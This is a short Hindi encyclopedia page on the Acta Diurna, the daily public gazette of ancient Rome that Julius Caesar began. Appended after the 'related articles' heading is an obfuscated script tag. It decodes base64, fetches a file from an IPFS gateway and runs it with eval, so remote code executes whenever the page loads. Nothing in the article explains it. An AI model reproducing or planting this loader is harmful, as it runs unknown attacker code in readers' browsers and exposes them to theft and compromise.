आत्ता दिउरना

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

आक्ता दिउरना प्राचीन रोम का गज़ट जिसमें नित्य की प्रधान घटनाओं का अधिकारियों द्वारा प्रकाशन होता था। उसमें राजकीय घोषणाओं के अतिरिक्त प्रधान व्यक्तियों के पुत्रों के जन्मादि का उल्लेख हुआ करता था। आक्ता का आरंभ जूलियस सीज़र ने ही किया था। सफेद तख्ते पर घटनाएँ लिखकर दिन भर के लिए सार्वजनिक स्थान पर तख्ता टाँग दिया जाता था, फिर उसे उठाकर राजकीय लेखागार में रख लेते थे। आक्ता दिउरता का प्रकाशन साम्राज्य के विभाजन तक चलता रहा।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. हिन्दी विश्वकोश, खण्ड 1 |प्रकाशक: नागरी प्रचारिणी सभा, वाराणसी |संकलन: भारत डिस्कवरी पुस्तकालय |पृष्ठ संख्या: 344 |

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>